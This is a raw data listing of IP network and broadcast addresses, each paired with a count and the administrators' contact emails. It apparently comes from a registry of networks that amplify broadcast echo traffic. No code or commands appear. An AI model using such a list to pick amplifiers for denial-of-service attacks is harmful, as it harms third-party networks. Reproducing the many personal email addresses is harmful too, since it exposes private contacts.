209.63.148.255 cbrown@advanced-power.com 32 207.246.134.0 edmond@flyingcroc.com 32 207.246.143.0 webmaster@redchicken.com 32 207.246.134.255 edmond@flyingcroc.com 32 207.246.143.255 webmaster@redchicken.com 32 216.101.17.255 cpuccetti@advmedicine.com 32 209.32.51.0 nomailbox@nowhere 32 207.224.249.0 dlongar@uswest.net 32 209.32.51.255 nomailbox@nowhere 32 210.208.166.255 tonyyuan@mail.my.net.tw 32 207.196.81.0 hostmaster@clark.net 32 207.17.200.0 avnet@radicalmedia.com 32 209.135.192.0 32 207.66.244.255 pat@wolfe.net 32 206.74.159.0 mckee@admin.infoave.net 32 206.74.159.255 mckee@admin.infoave.net 32 209.79.52.0 marc@service.com 32 206.215.195.0 jdecryberry@cupnb.com 32 209.47.228.255 chris@tntech.com 32 209.7.241.0 djurewic@lth3.k12.il.us 32 208.13.18.255 nomailbox@nowhere 32 206.23.197.255 jwinters@tec.net 31 152.3.228.0 rdc@netcom.duke.edu 31 152.3.228.255 rdc@netcom.duke.edu 31 192.160.217.0 greenup@whittier.edu 31 193.188.61.0 kha@knpc.com.kw, hmb@knpc.com.kw 31 194.167.45.0 bdulmet@ens2m.fr 31 194.209.156.0 hostmaster@screenlight.ch 31 194.209.156.255 hostmaster@screenlight.ch 31 194.252.70.0 jarmo.miettinen@sonera.fi, matti.aarnio@tele.fi 31 194.68.198.255 31 199.111.79.0 jaj@virginia.edu 31 202.101.127.0 31 202.102.13.0 dmkou@publicf.bta.net.cn, pearl.m@public1.ptt.js.cn 31 202.102.32.0 dmkou@publicf.bta.net.cn, pearl.m@public1.ptt.js.cn 31 202.102.32.255 dmkou@publicf.bta.net.cn, pearl.m@public1.ptt.js.cn 31 202.247.6.0 hostmaster@nic.ad.jp 31 203.180.182.0 hostmaster@nic.ad.jp 31 203.180.182.255 hostmaster@nic.ad.jp 31 203.182.48.0 hostmaster@nic.ad.jp 31 203.238.131.0 mgr@nownuri.net, ip@nownuri.net 31 204.32.80.255 bille@petersons.com 31 205.185.160.0 Louis_Lee@icgcomm.com 31 205.231.58.255 help@uunet.uu.net 31 205.232.18.255 denz@ria.org 31 206.163.24.255 spencer@bendnet.com 31 207.137.159.255 netops@4d.net 31 206.23.197.0 jwinters@tec.net 31 210.145.24.0 hostmaster@nic.ad.jp 31 210.17.1.255 dengwei@access.ttn.com.tw 31 216.50.134.0 technical@kivex.com 31 208.241.46.255 slokuge@2launch.com 31 208.168.246.255 kenwhit@remc8.k12.mi.us 31 209.133.94.255 noc@above.net 31 216.111.166.255 noc@qwest.net 31 206.64.4.0 jba@genx.net 31 208.196.34.255 jimj@rp-l.com 31 206.23.195.255 jwinters@tec.net 31 212.86.0.0 Teemu.Anttila@verkkotieto.com 31 208.212.74.0 espencer@globix.com 31 212.86.0.255 Teemu.Anttila@verkkotieto.com 31 208.212.74.255 espencer@globix.com 31 208.10.133.0 nomailbox@nowhere 31 216.168.160.255 talal@vipcalling.com 31 216.168.160.0 talal@vipcalling.com 31 207.215.238.255 jaykata@ltsc.org 31 216.168.161.0 talal@vipcalling.com 31 209.3.40.0 noc@iconnet.net 31 209.39.24.255 netadmin@onramp.net 31 209.10.126.0 hostmaster@globix.net 31 207.244.119.255 nitromed@shore.net 31 208.29.189.0 nomailbox@nowhere 31 208.168.231.0 bjoyce@remc8.k12.mi.us 31 208.168.231.255 bjoyce@remc8.k12.mi.us 30 63.64.128.255 info@schwablearning.org 30 166.45.5.0 hostmaster@mci.net 30 166.45.5.255 hostmaster@mci.net 30 192.174.35.255 30 193.120.12.0 noc@esat.net 30 193.120.12.255 noc@esat.net 30 193.170.126.0 m.mauerkirchner@mail.htl-leonding.ac.at, m.mauerkirchner@mail.asn-linz.ac.at, Karoly.Erdei@risc.uni-linz.ac.at, Karoly.Erdei@risc.uni-linz.ac.at 30 193.67.180.0 joppe.van.der.reijden@veronica.nl, luuk@veronica.nl 30 194.93.134.255 mcarr@intensive.net, j.baker@intensive.net 30 195.141.0.0 robert.jones@sunrise.ch, peter.zopfi@sunrise.ch, stefan.thoma@sunrise.ch 30 195.232.126.255 hostmaster@wcom.net 30 198.112.56.255 mikem@cw.com 30 198.243.153.0 dtorbet@jonesinternet.com 30 198.25.218.0 JWELLS@gi-link.dcrb.dla.mil 30 198.76.85.0 dmcginni@ndu.edu 30 198.76.85.255 dmcginni@ndu.edu 30 199.111.105.0 jaj@virginia.edu 30 199.111.105.255 jaj@virginia.edu 30 199.182.135.0 hostmaster@maxstrat.com 30 199.183.164.0 Louis_Lee@icgcomm.com 30 199.249.19.255 paul.weber@mci.com 30 199.72.94.0 hostmaster@interpath.net 30 199.72.95.0 hostmaster@interpath.net 30 199.72.95.255 hostmaster@interpath.net 30 202.102.13.255 dmkou@publicf.bta.net.cn, pearl.m@public1.ptt.js.cn 30 202.232.119.0 hostmaster@nic.ad.jp 30 202.36.35.0 30 203.110.2.0 philip@voyager.co.nz, mat@voyager.co.nz 30 203.110.2.255 philip@voyager.co.nz, mat@voyager.co.nz 30 203.238.131.255 mgr@nownuri.net, ip@nownuri.net 30 203.98.1.0 philip@voyager.co.nz, aitken@fruean.com 30 203.98.38.0 dsharples@oibunzl2.telstra.com.au 30 204.168.184.255 bill.russell@nyu.edu 30 204.178.107.255 danny@akamai.com 30 204.178.110.0 danny@akamai.com 30 204.178.110.255 aperry@symantec.com 30 204.32.80.0 bille@petersons.com 30 205.232.18.0 denz@ria.org 30 206.23.195.0 jwinters@tec.net 30 209.49.144.255 jamie@itribe.net 30 207.86.190.255 dns@digex.net 30 206.205.105.0 noc@digex.net 30 216.168.242.0 cwei@netsol.com 30 216.168.242.255 cwei@netsol.com 30 210.236.10.255 hostmaster@nic.ad.jp 30 209.220.50.255 hostmaster@concentric.net 30 208.167.146.255 lpowers@eastky.net 30 208.227.145.0 spell@wilmington.net 30 216.50.134.255 technical@kivex.com 30 208.227.144.255 spell@wilmington.net 30 206.6.19.0 hostinfo@psi.com 30 209.220.50.0 hostmaster@concentric.net 30 209.140.163.0 darin@good.net 30 209.140.163.255 darin@good.net 30 207.245.26.255 NOCToronto@metronet.ca 30 208.217.4.0 norrg001@gold.tc.umn.edu 30 207.110.28.0 kit@connectnet.com 30 209.76.0.0 aleph1@dfw.net 30 209.76.1.0 30 209.76.2.0 aleph1@dfw.net 30 208.228.215.0 jsutherlin@pacificcolor.com 30 208.228.215.255 jsutherlin@pacificcolor.com 30 209.226.73.0 noc@in.bell.ca 30 209.226.73.255 noc@in.bell.ca 30 207.96.117.0 domreg@erols.com 30 207.96.117.255 domreg@erols.com 30 207.212.182.255 ip-admin@pbi.net 30 208.157.105.255 ipadmin@desupernet.net 30 209.79.52.255 marc@service.com 30 206.225.61.255 kenneth@jump.net 30 208.201.184.255 nomailbox@nowhere 30 208.2.250.0 nomailbox@nowhere 29 143.213.220.0 MILLARDD@shafter-emh3.army.mil 29 143.213.251.0 MILLARDD@shafter-emh3.army.mil 29 161.223.163.0 29 167.199.168.0 jda51@state.ga.us 29 168.234.39.0 mmorales@concyt.gob.gt 29 192.190.131.255 Annie.Renard@inria.fr 29 193.0.80.0 Marcin.Gromisz@fuw.edu.pl, Michal.Jankowski@fuw.edu.pl 29 193.188.81.0 29 193.188.81.255 29 193.52.99.0 tchou@narech.dnet.circe.fr, jacky.gabriel@sciences.univ-nantes.fr, jacky.gabriel@sciences.univ-nantes.fr 29 193.52.99.255 tchou@narech.dnet.circe.fr, jacky.gabriel@sciences.univ-nantes.fr, jacky.gabriel@sciences.univ-nantes.fr 29 194.151.42.255 beheer@a1.nl 29 194.205.160.0 support@insnet.net 29 194.207.107.255 andy@openworld.co.uk 29 194.79.131.255 support@internext.fr, sam@internext.fr 29 194.79.163.0 lgadot@nbo.fr 29 194.79.163.255 lgadot@nbo.fr 29 194.79.164.0 support@internext.fr, sam@internext.fr 29 194.79.164.255 support@internext.fr, sam@internext.fr 29 199.182.135.255 hostmaster@maxstrat.com 29 199.183.165.255 Louis_Lee@icgcomm.com 29 199.72.140.255 hostmaster@interpath.net 29 200.16.176.255 nomailbox@nowhere 29 200.30.32.0 nomailbox@nowhere 29 200.30.32.255 nomailbox@nowhere 29 202.167.35.0 paul.brooks@globalone.net 29 202.167.35.255 paul.brooks@globalone.net 29 202.36.35.255 29 203.21.29.255 hostmaster@telstra.net 29 204.101.194.0 debbie@worldlinx.com 29 204.101.194.255 debbie@worldlinx.com 29 204.152.145.0 netmaster@organic.com 29 204.152.145.255 netmaster@organic.com 29 204.178.38.0 smith@icarus.usanetworks.com 29 204.178.38.255 smith@icarus.usanetworks.com 29 204.28.66.255 mi00101@mi00040.monroe.k12.la.us 29 204.71.144.0 ipadmin@cw.net 29 204.71.144.255 ipadmin@cw.net 29 205.143.124.255 rtesta@gia.org 29 205.152.39.255 ipadmin@bellsouth.net 29 205.169.153.255 ckimball@mapquest.com 29 205.174.194.0 dharringt@deq.state.va.us 29 205.205.132.0 dgiroux@cenosis.com 29 205.211.37.0 teha@algonquinc.on.ca 29 205.211.53.0 teha@algonquinc.on.ca 29 205.232.52.255 rcm@mmc.marymt.edu 29 205.243.207.0 ryan@inc.net 29 216.111.167.255 noc@qwest.net 29 206.20.225.0 noc@corp.idt.net 29 206.196.103.255 steve@inlink.com 29 208.203.140.0 asbad@camalott.com 29 209.38.216.0 dnsadmin@rmi.net 29 208.166.84.255 jgagne@monad.net 29 208.203.140.255 asbad@camalott.com 29 209.38.216.255 dnsadmin@rmi.net 29 207.22.96.0 hostmaster@clark.net 29 208.234.147.0 nomailbox@nowhere 29 208.157.126.0 rodneyl@ctlnet.com 29 207.66.209.255 pat@wolfe.net 29 208.130.144.0 nomailbox@nowhere 29 216.20.20.255 jcoco@mec.edu 29 212.208.226.0 hahn@rmcnet.fr, olemarie@fr.uu.net 29 207.215.238.0 jaykata@ltsc.org 29 207.213.16.0 nomailbox@nowhere 29 207.213.16.255 nomailbox@nowhere 29 209.187.17.0 dns@cerf.net 29 207.156.130.0 mpr@li.net 29 209.3.41.255 noc@iconnet.net 29 208.130.144.255 nomailbox@nowhere 29 208.150.32.0 noc@megsinet.net 29 208.157.105.0 ipadmin@desupernet.net 29 209.132.109.255 garyq@wpds.com 29 207.97.140.0 sbriggs@i-2000.com 29 207.97.140.255 sbriggs@i-2000.com 29 207.240.141.255 hostmaster@inch.com 29 207.21.119.0 hostmaster@ncal.verio.net 29 209.7.241.255 djurewic@lth3.k12.il.us 29 208.215.55.0 bo@quicklink.com 29 209.0.254.0 ipadmin@level3.net 29 209.0.254.255 ipadmin@level3.net 29 209.63.26.255 bradw@tlg.com 28 167.199.169.255 jda51@state.ga.us 28 193.188.63.255 kha@knpc.com.kw, hmb@knpc.com.kw 28 193.74.176.0 mdevos@argo.be, Francois.Wouters@gemeenschapsonderwijs.be 28 194.133.98.0 loison@artinternet.fr, gaiffe@ordipat.fr 28 194.151.42.0 beheer@a1.nl 28 195.202.146.0 herbert.voegl@kabsi.at, chris@streams.at, christian.steger@indis.at 28 199.178.74.255 hostmaster@ameritech.net 28 199.98.104.0 hostinfo@psi.com 28 199.98.104.255 hostinfo@psi.com 28 200.16.177.0 nomailbox@nowhere 28 202.214.252.255 hostmaster@nic.ad.jp 28 202.219.144.0 technical@apnic.net 28 202.238.79.0 hostmaster@nic.ad.jp 28 202.238.79.255 hostmaster@nic.ad.jp 28 204.186.98.0 dns-request@ptd.net 28 204.233.237.0 tcampbell@verio.net 28 204.233.237.255 tcampbell@verio.net 28 204.242.237.255 hostinfo@psi.com 28 204.28.66.0 mi00101@mi00040.monroe.k12.la.us 28 204.97.21.255 stewartw@fpc.edu 28 204.97.74.0 nomailbox@nowhere 28 204.97.74.255 nomailbox@nowhere 28 205.139.127.255 kerrigan@syrlang.com 28 205.169.153.0 ckimball@mapquest.com 28 205.216.184.0 daniel@wolfgroup.com 28 206.112. dave@ntr.net 28 206.112.14.255 jchurch@ntr.net 28 206.169.28.0 hostmaster@hooked.net 28 207.132.232.255 HOSTMASTER@nic.mil 28 207.25.98.255 noc@ans.net 28 207.245.225.0 andre@storm.ca 28 207.245.225.255 andre@storm.ca 28 208.133.75.0 noc@megsinet.net 28 208.133.76.0 noc@megsinet.net 28 208.133.87.0 noc@megsinet.net 28 210.161.135.0 hostmaster@nic.ad.jp 28 207.95.245.0 Louis_Lee@icgcomm.com 28 208.133.75.255 noc@megsinet.net 28 208.133.76.255 noc@megsinet.net 28 208.133.87.255 noc@megsinet.net 28 210.161.135.255 hostmaster@nic.ad.jp 28 207.95.245.255 Louis_Lee@icgcomm.com 28 208.207.33.0 noc@bigplanet.net 28 208.166.84.0 28 207.96.63.255 domreg@erols.com 28 206.97.4.0 william.winkel@spencergifts.com 28 216.96.23.0 randy@greatplainsmfg.com 28 207.245.26.0 NOCToronto@metronet.ca 28 209.47.235.0 pamela@ebean.com 28 209.47.235.255 pamela@ebean.com 28 216.161.32.0 dns-info@uswest.net 28 216.161.32.255 dns-info@uswest.net 28 207.208.90.0 hostmaster@interaccess.com 28 207.208.93.0 hostmaster@interaccess.com 28 216.101.120.0 ip-admin@pbi.net 28 216.101.123.255 ip-admin@pbi.net 28 206.247.216.255 dnsadmin@rmi.net 28 212.208.227.255 hahn@rmcnet.fr, olemarie@fr.uu.net 28 216.20.20.0 jcoco@mec.edu 28 208.244.213.255 pforbes@opcode.com 28 209.81.187.255 noc@megsinet.net 28 209.81.189.255 noc@megsinet.net 28 209.167.146.0 itelford@scaleable.com 28 209.81.187.0 noc@megsinet.net 28 209.132.109.0 garyq@wpds.com 28 216.161.33.0 dns-info@uswest.net 28 216.161.33.255 dns-info@uswest.net 28 209.8.0.0 domreg@cais.net 28 209.70.110.255 hostmaster@clark.net 28 208.142.122.0 hostmaster@mci.net 28 210.139.3.255 hostmaster@nic.ad.jp 28 208.142.122.255 hostmaster@mci.net 27 143.43.248.0 D-Romano@wiu.edu 27 167.67.195.255 grant.jensen@emd-tech.com 27 168.234.36.0 mmorales@concyt.gob.gt 27 192.70.104.0 Annie.Renard@inria.fr 27 193.158.2.0 tgoetz@cube.net, Horn@eins-und-eins.de 27 193.188.51.255 kha@knpc.com.kw, hmb@knpc.com.kw 27 193.252.125.0 postmaster@wanadoo.fr, abuse@wanadoo.fr, Sylvain.Causse@wanadoo.com 27 193.54.52.255 Denis.Pays@univ-bpclermont.fr, Claude.Gendraud@univ-bpclermont.fr 27 193.74.176.255 mdevos@argo.be, Francois.Wouters@gemeenschapsonderwijs.be 27 193.74.177.0 mdevos@argo.be, Francois.Wouters@gemeenschapsonderwijs.be 27 194.133.98.255 loison@artinternet.fr, gaiffe@ordipat.fr 27 194.96.123.0 libischer@via.at 27 194.96.123.255 libischer@via.at 27 195.180.58.255 kai.bessler@windi.de, joswig@lavielle.com 27 195.246.135.255 loison@artinternet.fr, lbernard@artinternet.fr 27 195.70.147.0 pavel@terminal.cz 27 198.112.56.0 mikem@cw.com 27 198.139.127.0 pradeep@stpb.soft.net 27 198.163.232.0 tech@escape.ca 27 198.163.232.255 tech@escape.ca 27 198.163.240.0 gordt@macrodyne.net 27 198.163.240.255 gordt@macrodyne.net 27 198.163.241.0 gordt@macrodyne.net 27 198.163.241.255 gordt@macrodyne.net 27 199.172.111.0 staylor@pen.ci.santa-monica.ca.us 27 199.172.111.255 staylor@pen.ci.santa-monica.ca.us 27 199.172.97.0 staylor@pen.ci.santa-monica.ca.us 27 199.172.97.255 staylor@pen.ci.santa-monica.ca.us 27 199.176.109.0 michael_jones@chi.leoburnett.com 27 199.234.16.0 27 199.73.39.255 hostmaster@clark.net 27 199.98.103.0 hostinfo@psi.com 27 199.98.103.255 hostinfo@psi.com 27 200.38.61.0 racuna@mpsnet.com.mx 27 200.38.61.255 racuna@mpsnet.com.mx 27 202.190.19.0 27 202.219.0.255 technical@apnic.net 27 203.116.195.0 chengkc@cyberway.com.sg, kennyng@cyberway.com.sg 27 203.116.195.255 chengkc@cyberway.com.sg, kennyng@cyberway.com.sg 27 203.116.81.0 chengkc@cyberway.com.sg, kennyng@cyberway.com.sg 27 203.116.95.0 chengkc@cyberway.com.sg, kennyng@cyberway.com.sg 27 203.126.200.255 hostmaster@singnet.com.sg 27 203.126.201.255 hostmaster@singnet.com.sg 27 203.127.27.0 meng@mediacity.com.sg, hostmaster@singnet.com.sg 27 203.127.27.255 meng@mediacity.com.sg, hostmaster@singnet.com.sg 27 203.179.212.0 hostmaster@nic.ad.jp 27 203.21.24.0 hostmaster@telstra.net 27 203.69.23.0 27 203.69.23.255 27 204.112.144.0 rstokes@infobahn.mb.ca 27 204.112.144.255 rstokes@infobahn.mb.ca 27 204.112.20.0 emarshal@logic.net 27 204.112.20.255 emarshal@logic.net 27 204.112.6.0 REMILLARD@solutions.net 27 204.112.6.255 REMILLARD@solutions.net 27 204.215.190.0 timj@tiac.net 27 204.242.237.0 hostinfo@psi.com 27 204.30.45.0 herbert.kwok@jwtworks.com 27 204.30.45.255 herbert.kwok@jwtworks.com 27 204.34.17.255 27 204.48.169.0 tuma@ceo.sbceo.k12.ca.us 27 204.48.169.255 tuma@ceo.sbceo.k12.ca.us 27 204.60.81.0 cmiller@snet.net 27 205.152.40.0 ipadmin@bellsouth.net 27 205.160.84.0 NOC@sprint.net 27 205.171.33.0 hostmaster@csn.net 27 205.227.63.255 lgoodman@iacnet.com 27 206.15.182.0 wink@ziplink.net 27 206.151.238.0 baltar@sy.com 27 207.100.46.255 hostmaster@icix.net 27 207.223.132.255 Louis_Lee@icgcomm.com 27 207.223.132.0 Louis_Lee@icgcomm.com 27 209.126.50.0 domreg@qni.com 27 209.147.16.0 art@lacoe.edu 27 209.147.24.0 art@lacoe.edu 27 207.99.200.0 art@lacoe.edu 27 209.147.14.255 art@lacoe.edu 27 209.147.15.255 art@lacoe.edu 27 207.233.136.0 noc@diginetusa.net 27 207.161.177.0 marc@escape.ca 27 207.233.136.255 noc@diginetusa.net 27 207.161.177.255 marc@escape.ca 27 208.240.37.0 kuba.tatarkiwicz@themedco.com 27 208.0.177.0 hostmaster@top.monad.net 27 216.96.23.255 randy@greatplainsmfg.com 27 208.0.177.255 hostmaster@top.monad.net 27 208.198.61.255 noc@atlantech.net 27 207.86.227.255 dns@digex.net 27 209.227.70.255 eric@mxol.com 27 207.208.93.255 hostmaster@interaccess.com 27 207.156.131.0 mpr@li.net 27 209.3.104.255 support@iconnet.net 27 210.150.28.255 hostmaster@nic.ad.jp 27 208.150.32.255 noc@megsinet.net 27 209.167.127.255 rmaclell@cancom.ca 27 208.151.220.255 ipswip@cw.net 27 207.91.25.0 jdelong@alphalincoln.com 27 208.167.58.255 27 208.2.81.255 jstabler@emi.net 27 209.227.75.0 eric@mxol.com 27 207.108.165.0 dns-info@uswest.net 27 208.221.186.255 nomailbox@nowhere 27 208.168.82.255 johnf@banet.net 27 208.192.151.255 registrar@netrax.net 27 206.68.107.0 maajid@aix.cps.edu 27 207.108.171.0 dns-info@uswest.net 27 206.68.107.255 maajid@aix.cps.edu 27 207.108.171.255 dns-info@uswest.net 27 216.51.58.0 technical@kivex.com 26 63.65.8.0 twright@cathedral.org 26 192.106.229.0 arnklit@mclink.it 26 193.45.251.0 Bertil.Hanses@trema.com 26 193.50.189.255 blanc@enit.fr 26 194.74.202.0 robinb@cityscape.co.uk 26 194.74.202.255 robinb@cityscape.co.uk 26 194.93.134.0 mcarr@intensive.net, j.baker@intensive.net 26 194.93.144.0 mcarr@intensive.net, j.baker@intensive.net 26 195.162.160.0 posa@univ-lyon1.fr 26 195.202.143.255 herbert.voegl@kabsi.at, chris@streams.at, christian.steger@indis.at 26 195.74.150.0 rday@blacksunplc.com, hostmaster@red.net 26 198.175.30.0 labbem@homes.com 26 198.175.30.255 labbem@homes.com 26 198.188.164.0 nes@4c.net 26 198.243.153.255 dtorbet@jonesinternet.com 26 198.64.44.255 hostmaster@sesqui.net 26 198.85.16.0 johnmi@walkerassoc.com 26 198.85.16.255 johnmi@walkerassoc.com 26 198.87.56.0 noc@bizserve.com 26 199.178.75.0 hostmaster@ameritech.net 26 199.4.121.0 cward@atgi.net 26 199.4.121.255 cward@atgi.net 26 199.98.105.0 hostinfo@psi.com 26 199.98.105.255 hostinfo@psi.com 26 199.98.106.0 hostinfo@psi.com 26 199.98.106.255 hostinfo@psi.com 26 200.129.170.255 gomide@nic.br 26 200.137.192.0 gomide@nic.br 26 200.16.177.255 nomailbox@nowhere 26 202.22.25.0 dns@netlink.co.nz 26 203.126.201.0 hostmaster@singnet.com.sg 26 203.127.92.255 cheong@singnet.com.sg, hostmaster@singnet.com.sg 26 203.96.16.255 craig@iprolink.co.nz, jshaw@actrix.gen.nz, jims@optimation.co.nz 26 203.96.51.255 craig@iprolink.co.nz, jshaw@actrix.gen.nz, jims@optimation.co.nz 26 204.142.228.0 caryl@rider.edu 26 204.142.228.255 caryl@rider.edu 26 204.158.26.0 D.Nash@utexas.edu 26 204.158.26.255 D.Nash@utexas.edu 26 204.210.83.255 rwintel@twmaine.com 26 204.243.42.0 hostinfo@psi.com 26 204.27.115.0 n@nectar.com 26 204.27.115.255 n@nectar.com 26 204.50.62.255 noc@sprint-canada.net 26 205.211.37.255 teha@algonquinc.on.ca 26 205.221.198.0 hikep@urbandale.k12.ia.us 26 205.228.252.0 robg@movielink.com 26 205.228.252.255 robg@movielink.com 26 206.132.219.0 snvnoc@globalcenter.net 26 206.156.173.0 markw@softech.co 26 206.156.173.255 markw@softech.co 26 207.86.188.0 dns@digex.net 26 207.104.36.0 chasw@windjammer.net 26 207.104.36.255 chasw@windjammer.net 26 207.141.28.255 akerlpw@lambgh.com 26 209.147.24.255 art@lacoe.edu 26 216.111.115.255 DLAURA@icsa.com 26 207.155.68.0 hostmaster@softaware.com 26 207.45.96.0 jfalk@itcmedia.com 26 207.196.81.255 hostmaster@clark.net 26 207.45.96.255 jfalk@itcmedia.com 26 206.221.202.0 domain-tech@hotwired.com 26 209.224.232.0 support@domainhost.com 26 207.22.96.255 hostmaster@clark.net 26 206.20.225.255 noc@corp.idt.net 26 209.224.235.255 support@domainhost.com 26 206.249.10.0 eric@mxol.com 26 208.157.56.0 alif@unibaseinc.com 26 216.115.160.0 alif@unibaseinc.com 26 207.159.193.0 chris@queens.lib.ny.us 26 208.157.59.255 alif@unibaseinc.com 26 216.115.160.255 alif@unibaseinc.com 26 207.159.193.255 chris@queens.lib.ny.us 26 207.17.211.0 dquiram@incc.net 26 207.203.218.0 ipadmin@bellsouth.net 26 208.139.68.255 bharvey@atmi.com 26 207.17.211.255 dquiram@incc.net 26 207.203.218.255 ipadmin@bellsouth.net 26 209.249.46.0 noc@above.net 26 207.109.43.255 dns-info@uswest.net 26 209.249.46.255 noc@above.net 26 209.63.86.255 kmiller@mhz.com 26 207.243.136.255 CWD@recoton.com 26 209.121.243.255 swip@istar.ca 26 209.124.64.0 cts@vec.net 26 209.124.71.255 cts@vec.net 26 209.82.81.0 NOCToronto@metronet.ca 26 209.82.88.255 NOCToronto@metronet.ca 26 209.63.86.0 kmiller@mhz.com 26 209.232.131.0 ip-admin@pbi.net 26 209.81.189.0 noc@megsinet.net 26 209.232.131.255 ip-admin@pbi.net 26 209.144.151.0 gary.wall@inet-systems.com 26 209.144.152.0 gary.wall@inet-systems.com 26 209.144.151.255 NOC@inet-systems.com 26 209.144.152.255 johnm@ikp.net 26 209.125.100.0 tsutomu@geocast.net 26 207.240.141.0 hostmaster@inch.com 26 209.173.69.0 bni@bnisolutions.com 26 209.226.83.0 noc@in.bell.ca 26 209.226.83.255 noc@in.bell.ca 26 216.123.8.0 sean@wenzel.net 26 208.154.220.0 jon@thoughtbubble.com 26 208.192.151.0 registrar@netrax.net 26 209.41.199.0 tstroup@fnsi.net 26 209.41.199.255 tstroup@fnsi.net 26 209.86.125.0 bac_net@mindspring.com 26 209.86.125.255 bac_net@mindspring.com 26 206.210.133.255 bpembert@amphi.com 25 129.113.180.0 burnett@panam1.panam.edu 25 129.113.180.255 burnett@panam1.panam.edu 25 134.241.97.255 hostmaster@umassp.edu 25 150.176.58.0 hostmaster@mail.firn.edu 25 192.204.156.0 JHEND@acnatsci.org 25 192.204.156.255 JHEND@acnatsci.org 25 192.204.19.0 JHEND@acnatsci.org 25 192.204.19.255 JHEND@acnatsci.org 25 192.244.1.0 yoshida@isse.oita-u.ac.jp 25 192.244.1.255 yoshida@isse.oita-u.ac.jp 25 192.250.24.0 diederik@eur.encompass.com 25 192.250.24.255 diederik@eur.encompass.com 25 193.44.99.0 orjan.l.swedberg@telia.se 25 193.44.99.255 orjan.l.swedberg@telia.se 25 193.5.54.0 25 193.5.54.255 25 193.50.189.0 blanc@enit.fr 25 194.235.135.255 csl01@mail.telepac.pt 25 194.70.212.255 postmaster@ngc.co.uk 25 194.77.100.0 de@lmnet.de 25 194.77.100.255 de@lmnet.de 25 195.134.68.0 25 195.182.177.0 25 195.224.200.0 rush@gxn.net, lol@xara.net 25 198.188.163.0 nes@4c.net 25 199.10.239.255 DSN1GCM@dsn10.med.navy.mil 25 199.108.250.0 dns@cerf.net 25 199.117.75.0 vicr@lobo.rmh.pr1.k12.co.us 25 199.117.75.255 vicr@lobo.rmh.pr1.k12.co.us 25 199.178.75.255 hostmaster@ameritech.net 25 199.2.208.255 NOC@sprint.net 25 199.72.96.0 hostmaster@interpath.net 25 199.72.96.255 hostmaster@interpath.net 25 200.34.164.0 jorge@ife.org.mx 25 200.34.164.255 jorge@ife.org.mx 25 200.34.165.0 jorge@ife.org.mx 25 200.34.165.255 jorge@ife.org.mx 25 200.34.166.0 jorge@ife.org.mx 25 200.34.166.255 jorge@ife.org.mx 25 202.104.150.0 25 202.104.150.255 25 202.104.151.0 25 202.104.151.255 25 202.214.252.0 hostmaster@nic.ad.jp 25 202.219.195.0 technical@apnic.net 25 202.24.143.255 hostmaster@nic.ad.jp 25 202.96.137.0 25 202.96.155.0 25 202.96.44.0 25 202.96.44.255 25 203.127.187.255 jeremy@sns.com.sg 25 203.172.11.255 25 203.96.16.0 craig@iprolink.co.nz, jshaw@actrix.gen.nz, jims@optimation.co.nz 25 204.0.28.0 hostmaster@sesqui.net 25 204.0.28.255 hostmaster@sesqui.net 25 204.158.119.255 gjenere@tenet.edu 25 204.168.129.0 ny0149@mail.nyer.net 25 204.168.129.255 ny0149@mail.nyer.net 25 204.233.66.255 Thane_White@shscom.com 25 204.248.144.0 NOC@sprint.net 25 204.248.144.255 NOC@sprint.net 25 204.255.210.0 michael@cytation.com 25 204.255.210.255 michael@cytation.com 25 204.29.120.0 DNS@asc.edu 25 204.29.120.255 DNS@asc.edu 25 204.48.204.255 tuma@ceo.sbceo.k12.ca.us 25 204.49.212.0 dns@sprintans.net 25 204.49.212.255 dns@sprintans.net 25 204.73.51.0 mike@haven.com 25 204.73.51.255 mike@haven.com 25 204.84.6.0 hostmaster@ncren.net 25 205.165.53.0 RIDDLE@twu.edu 25 205.165.53.255 RIDDLE@twu.edu 25 205.171.33.255 hostmaster@csn.net 25 205.174.194.255 dharringt@deq.state.va.us 25 205.227.63.0 lgoodman@iacnet.com 25 205.230.187.0 bob@new-york.net 25 206.108.86.0 bhewlitt@interlog.com 25 206.13.99.0 gowen@keyinfo.com 25 206.132.166.0 ipadmin@globalcenter.net 25 206.132.166.255 ipadmin@globalcenter.net 25 206.132.219.255 snvnoc@globalcenter.net 25 206.154.10.0 hostmaster@netmcr.com 25 206.154.10.255 hostmaster@netmcr.com 25 206.158.44.255 Allen@afmiller.com 25 207.213.94.0 admin@zcs.net 25 210.145.27.0 hostmaster@nic.ad.jp 25 209.147.16.255 art@lacoe.edu 25 209.147.14.0 art@lacoe.edu 25 207.96.63.0 domreg@erols.com 25 207.1.177.0 dspeed@midusa.net 25 207.31.222.255 swip-admin@newengland.verio.net 25 216.111.115.0 DLAURA@icsa.com 25 207.49.107.255 ipadmin@cw.net 25 216.100.185.0 ip-admin@pbi.net 25 216.100.186.0 ip-admin@pbi.net 25 216.100.187.0 ip-admin@pbi.net 25 216.100.188.0 ip-admin@pbi.net 25 216.100.189.0 ip-admin@pbi.net 25 207.159.47.255 noc@ns.net 25 216.100.186.255 ip-admin@pbi.net 25 216.100.187.255 ip-admin@pbi.net 25 216.100.188.255 ip-admin@pbi.net 25 216.100.189.255 ip-admin@pbi.net 25 208.197.35.0 25 206.225.61.0 kenneth@jump.net 25 208.139.68.0 bharvey@atmi.com 25 209.102.84.0 dns-admin@ixa.net 25 206.246.140.0 robert@iquest.net 25 208.200.177.0 michael@cytation.com 25 208.197.35.255 michael@cytation.com 25 206.246.140.255 robert@iquest.net 25 208.200.177.255 michael@cytation.com 25 207.165.193.255 dave.klinkefus@icn.state.ia.us 25 207.228.38.0 dan@clp.com 25 207.175.108.0 ipadmin@gte.net 25 207.175.124.0 ipadmin@gte.net 25 207.175.125.0 ipadmin@gte.net 25 210.161.160.0 hostmaster@nic.ad.jp 25 210.63.176.0 maxkuan@ttn.com.tw, dean@ht.net.tw 25 208.152.233.0 doug@cookman.edu 25 212.58.35.255 ibreakey1@csi.com, hostmaster@red.net 25 207.228.38.255 dan@clp.com 25 207.175.108.255 ipadmin@gte.net 25 207.175.124.255 ipadmin@gte.net 25 207.175.125.255 ipadmin@gte.net 25 210.161.160.255 hostmaster@nic.ad.jp 25 210.63.176.255 maxkuan@ttn.com.tw, dean@ht.net.tw 25 208.152.233.255 doug@cookman.edu 25 209.60.125.0 internic@doitnow.com 25 207.243.136.0 CWD@recoton.com 25 207.98.156.0 hp@doitnow.com 25 209.223.174.0 treyco@internow.net 25 209.223.175.0 treyco@internow.net 25 209.144.193.0 boo@stilyagin.com 25 207.16.219.0 help@uunet.uu.net 25 210.169.71.255 hostmaster@nic.ad.jp 25 207.208.90.255 hostmaster@interaccess.com 25 209.60.125.255 